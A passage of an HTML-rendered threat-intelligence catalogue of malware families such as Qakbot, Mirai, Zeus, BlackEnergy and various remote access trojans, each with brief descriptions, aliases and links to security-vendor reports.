</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_palevo"><a class="anchor" href="#_palevo"></a><a class="link" href="#_palevo">Palevo</a></h3>
</div>
<div class="sect2">
<h3 id="_akbot_2"><a class="anchor" href="#_akbot_2"></a><a class="link" href="#_akbot_2">Akbot</a></h3>
<div class="paragraph">
<p>Akbot is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Qbot</p>
</li>
<li>
<p>Qakbot</p>
</li>
<li>
<p>PinkSlipBot</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2624. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Akbot">https://en.wikipedia.org/wiki/Akbot</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_upatre"><a class="anchor" href="#_upatre"></a><a class="link" href="#_upatre">Upatre</a></h3>
<div class="paragraph">
<p>Upatre is a Trojan downloader that is used to set up other threats on the victim&#8217;s PC. Upatre has been used recently in several high profile Trojan attacks involving the Gameover Trojan.</p>
</div>
</div>
<div class="sect2">
<h3 id="_vawtrak_2"><a class="anchor" href="#_vawtrak_2"></a><a class="link" href="#_vawtrak_2">Vawtrak</a></h3>
<div class="paragraph">
<p>Vawtrak is an information stealing malware family that is primarily used to gain unauthorised access to bank accounts through online banking websites.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2625. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.sophos.com/medialibrary/PDFs/technical%20papers/sophos-vawtrak-international-crimeware-as-a-service-tpna.pdf">https://www.sophos.com/medialibrary/PDFs/technical%20papers/sophos-vawtrak-international-crimeware-as-a-service-tpna.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_empire_2"><a class="anchor" href="#_empire_2"></a><a class="link" href="#_empire_2">Empire</a></h3>
<div class="paragraph">
<p>Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2626. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/adaptivethreat/Empire">https://github.com/adaptivethreat/Empire</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_explosive"><a class="anchor" href="#_explosive"></a><a class="link" href="#_explosive">Explosive</a></h3>
<div class="paragraph">
<p>Beginning in late 2012, a carefully orchestrated attack campaign we call Volatile Cedar has been targeting individuals, companies and institutions worldwide. This campaign, led by a persistent attacker group, has successfully penetrated a large number of targets using various attack techniques, and specifically, a custom-made malware implant codenamed Explosive.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2627. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.checkpoint.com/downloads/volatile-cedar-technical-report.pdf">https://www.checkpoint.com/downloads/volatile-cedar-technical-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_keyboy"><a class="anchor" href="#_keyboy"></a><a class="link" href="#_keyboy">KeyBoy</a></h3>
<div class="paragraph">
<p>The actors used a new version of “KeyBoy,” a custom backdoor first disclosed by researchers at Rapid7 in June 2013. Their work outlined the capabilities of the backdoor, and exposed the protocols and algorithms used to hide the network communication and configuration data</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2628. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://citizenlab.org/2016/11/parliament-keyboy/">https://citizenlab.org/2016/11/parliament-keyboy/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india">https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_yahoyah"><a class="anchor" href="#_yahoyah"></a><a class="link" href="#_yahoyah">Yahoyah</a></h3>
<div class="paragraph">
<p>The attacks in this case are associated with a campaign called Tropic Trooper, which has been active since at least 2011 and is known for heavily targeting Taiwan. One of the attacks used their known Yahoyah malware&#8230;&#8203;</p>
</div>
<div class="paragraph">
<p>Yahoyah is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>W32/Seeav</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2629. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/">http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tartine"><a class="anchor" href="#_tartine"></a><a class="link" href="#_tartine">Tartine</a></h3>
<div class="paragraph">
<p>Delphi RAT used by Sofacy.</p>
</div>
</div>
<div class="sect2">
<h3 id="_mirai_2"><a class="anchor" href="#_mirai_2"></a><a class="link" href="#_mirai_2">Mirai</a></h3>
<div class="paragraph">
<p>Mirai (Japanese for "the future") is malware that turns computer systems running Linux into remotely controlled "bots", that can be used as part of a botnet in large-scale network attacks. It primarily targets online consumer devices such as remote cameras and home routers. The Mirai botnet has been used in some of the largest and most disruptive distributed denial of service (DDoS) attacks, including an attack on 20 September 2016 on computer security journalist Brian Krebs&#8217;s web site, an attack on French web host OVH and the October 2016 Dyn cyberattack.</p>
</div>
<div class="paragraph">
<p>Mirai is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Linux/Mirai</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2630. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Mirai_(malware)">https://en.wikipedia.org/wiki/Mirai_(malware)</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_masuta"><a class="anchor" href="#_masuta"></a><a class="link" href="#_masuta">Masuta</a></h3>
<div class="paragraph">
<p>IoT malware based on Mirai but slightly improved.</p>
</div>
<div class="paragraph">
<p>Masuta is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PureMasuta</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2631. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7">https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bashlite"><a class="anchor" href="#_bashlite"></a><a class="link" href="#_bashlite">BASHLITE</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_2"><a class="anchor" href="#_blackenergy_2"></a><a class="link" href="#_blackenergy_2">BlackEnergy</a></h3>
<div class="paragraph">
<p>BlackEnergy is a trojan which has undergone significant functional changes since it was first publicly analysed by Arbor Networks in 2007. It has evolved from a relatively simple DDoS trojan into a relatively sophisticated piece of modern malware with a modular architecture, making it a suitable tool for sending spam and for online bank fraud, as well as for targeted attacks. BlackEnergy version 2, which featured rootkit techniques, was documented by SecureWorks in 2010. The targeted attacks recently discovered are proof that the trojan is still alive and kicking in 2014. We provide a technical analysis of the BlackEnergy family, focusing on novel functionality and the differences introduced by new lite variants. We describe the most notable aspects of the malware, including its techniques for bypassing UAC, defeating the signed driver requirement in Windows and a selection of BlackEnergy2 plug-ins used for parasitic file infections, network discovery and remote code execution and data collection.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2632. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/conference/vb2014/abstracts/back-blackenergy-2014-targeted-attacks-ukraine-and-poland/">https://www.virusbulletin.com/conference/vb2014/abstracts/back-blackenergy-2014-targeted-attacks-ukraine-and-poland/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trojan_seaduke"><a class="anchor" href="#_trojan_seaduke"></a><a class="link" href="#_trojan_seaduke">Trojan.Seaduke</a></h3>
<div class="paragraph">
<p>Trojan.Seaduke is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files.</p>
</div>
<div class="paragraph">
<p>Trojan.Seaduke is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Seaduke</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2633. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-031915-4935-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-031915-4935-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_backdoor_tinybaron"><a class="anchor" href="#_backdoor_tinybaron"></a><a class="link" href="#_backdoor_tinybaron">Backdoor.Tinybaron</a></h3>
</div>
<div class="sect2">
<h3 id="_incognito_rat"><a class="anchor" href="#_incognito_rat"></a><a class="link" href="#_incognito_rat">Incognito RAT</a></h3>
</div>
<div class="sect2">
<h3 id="_downrage"><a class="anchor" href="#_downrage"></a><a class="link" href="#_downrage">DownRage</a></h3>
<div class="paragraph">
<p>DownRage is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Carberplike</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2634. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/">https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/Timo_Steffens/status/814781584536719360">https://twitter.com/Timo_Steffens/status/814781584536719360</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_chthonic_2"><a class="anchor" href="#_chthonic_2"></a><a class="link" href="#_chthonic_2">Chthonic</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2635. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan">https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_geminiduke_2"><a class="anchor" href="#_geminiduke_2"></a><a class="link" href="#_geminiduke_2">GeminiDuke</a></h3>
<div class="paragraph">
<p>GeminiDuke is malware that was used by APT29 from 2009 to 2012.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2636. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0049">https://attack.mitre.org/wiki/Software/S0049</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zeus_3"><a class="anchor" href="#_zeus_3"></a><a class="link" href="#_zeus_3">Zeus</a></h3>
<div class="paragraph">
<p>Trojan.Zbot, also called Zeus, is a Trojan horse that attempts to steal confidential information from the compromised computer. It may also download configuration files and updates from the Internet. The Trojan is created using a Trojan-building toolkit.</p>
</div>
<div class="paragraph">
<p>Zeus is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Trojan.Zbot</p>
</li>
<li>
<p>Zbot</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2637. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Zeus_(malware)">https://en.wikipedia.org/wiki/Zeus_(malware)</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2010-011016-3514-99">https://www.symantec.com/security_response/writeup.jsp?docid=2010-011016-3514-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shifu"><a class="anchor" href="#_shifu"></a><a class="link" href="#_shifu">Shifu</a></h3>
<div class="paragraph">
<p>Shifu is a Banking Trojan first discovered in 2015. Shifu is based on the Shiz source code which incorporated techniques used by Zeus. Attackers use Shifu to steal credentials for online banking websites around the world, starting in Russia but later including the UK, Italy, and others.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2638. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/">http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shiz"><a class="anchor" href="#_shiz"></a><a class="link" href="#_shiz">Shiz</a></h3>
<div class="paragraph">
<p>The new variant of the Shiz Trojan malware targets mission-critical enterprise resource planning (ERP) applications — particularly SAP users.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2639. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/tag/shiz-trojan-malware/">https://securityintelligence.com/tag/shiz-trojan-malware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mm_core"><a class="anchor" href="#_mm_core"></a><a class="link" href="#_mm_core">MM Core</a></h3>
<div class="paragraph">
<p>Also known as “BaneChant”, MM Core is a file-less APT which is executed in memory by a downloader component. It was first reported in 2013 under the version number “2.0-LNK” where it used the tag “BaneChant” in its command-and-control (C2) network request. A second version “2.1-LNK” with the network tag “StrangeLove” was discovered shortly after.</p>
</div>
<div class="paragraph">
<p>MM Core is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>MM Core backdoor</p>
</li>
<li>
<p>BigBoss</p>
</li>
<li>
<p>SillyGoose</p>
</li>
<li>
<p>BaneChant</p>
</li>
<li>
<p>StrangeLove</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2640. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose">https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shamoon_2"><a class="anchor" href="#_shamoon_2"></a><a class="link" href="#_shamoon_2">Shamoon</a></h3>
<div class="paragraph">
<p>Shamoon,[a] also known as Disttrack, is a modular computer virus discovered by Seculert[1] in 2012, targeting recent NT kernel-based versions of Microsoft Windows. The virus has been used for cyber espionage in the energy sector.[2][3][4] Its discovery was announced on 16 August 2012 by Symantec,[3] Kaspersky Lab,[5] and Seculert.[6] Similarities have been highlighted by Kaspersky Lab and Seculert between Shamoon and the Flame malware.[5][6]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2641. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Shamoon">https://en.wikipedia.org/wiki/Shamoon</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ghostadmin"><a class="anchor" href="#_ghostadmin"></a><a class="link" href="#_ghostadmin">GhostAdmin</a></h3>
<div class="paragraph">
<p>According to MalwareHunterTeam and other researchers that have looked at the malware&#8217;s source code, GhostAdmin seems to be a reworked version of CrimeScene, another botnet malware family that was active around 3-4 years ago.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2642. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/">https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_eyepyramid_malware"><a class="anchor" href="#_eyepyramid_malware"></a><a class="link" href="#_eyepyramid_malware">EyePyramid Malware</a></h3>
<div class="paragraph">
<p>Two Italians referred to as the “Occhionero brothers” have been arrested and accused of using malware and a carefully-prepared spear-phishing scheme to spy on high-profile politicians and businessmen. This case has been called “EyePyramid”, which we first discussed last week. (Conspiracy theories aside, the name came from a domain name and directory path that was found during the research.)</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2643. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-inner-workings-eyepyramid/">http://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-inner-workings-eyepyramid/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_luminositylink"><a class="anchor" href="#_luminositylink"></a><a class="link" href="#_luminositylink">LuminosityLink</a></h3>
<div class="paragraph">
<p>LuminosityLink is a malware family costing $40 that purports to be a system administration utility</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2644. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/">http://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_flokibot"><a class="anchor" href="#_flokibot"></a><a class="link" href="#_flokibot">Flokibot</a></h3>
<div class="paragraph">
<p>Floki Bot, described recently by Dr. Peter Stephenson from SC Magazine, is yet another bot based on the leaked Zeus code. However, the author came up with various custom modifications that makes it more interesting.</p>
</div>
<div class="paragraph">
<p>Flokibot is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Floki Bot</p>
</li>
<li>
<p>Floki</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2645. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/">https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/">https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zerot"><a class="anchor" href="#_zerot"></a><a class="link" href="#_zerot">ZeroT</a></h3>
<div class="paragraph">
<p>Most recently, we have observed the same group targeting military and aerospace interests in Russia and Belarus. Since the summer of 2016, this group began using a new downloader known as ZeroT to install the PlugX remote access Trojan (RAT) and added Microsoft Compiled HTML Help (.chm) as one of the initial droppers delivered in spear-phishing emails.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2646. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx">https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_streamex_2"><a class="anchor" href="#_streamex_2"></a><a class="link" href="#_streamex_2">StreamEx</a></h3>
<div class="paragraph">
<p>Cylance dubbed this family of malware StreamEx, based upon a common exported function used across all samples stream, combined with the dropper functionality to append ex to the DLL file name. The StreamEx family has the ability to access and modify the users file system, modify the registry, create system services, enumerate process and system information, enumerate network resources and drive types, scan for security tools such as firewall products and antivirus products, change browser security settings, and remotely execute commands. The malware documented in this post was predominantly 64-bit, however, there are 32-bit versions of the malware in the wild.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2647. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar">https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adzok_2"><a class="anchor" href="#_adzok_2"></a><a class="link" href="#_adzok_2">adzok</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2648. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_albertino"><a class="anchor" href="#_albertino"></a><a class="link" href="#_albertino">albertino</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2649. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_arcom_2"><a class="anchor" href="#_arcom_2"></a><a class="link" href="#_arcom_2">arcom</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2650. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blacknix_2"><a class="anchor" href="#_blacknix_2"></a><a class="link" href="#_blacknix_2">blacknix</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2651. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bluebanana"><a class="anchor" href="#_bluebanana"></a><a class="link" href="#_bluebanana">bluebanana</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2652. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bozok_2"><a class="anchor" href="#_bozok_2"></a><a class="link" href="#_bozok_2">bozok</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2653. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_clientmesh_2"><a class="anchor" href="#_clientmesh_2"></a><a class="link" href="#_clientmesh_2">clientmesh</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2654. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cybergate_2"><a class="anchor" href="#_cybergate_2"></a><a class="link" href="#_cybergate_2">cybergate</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2655. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
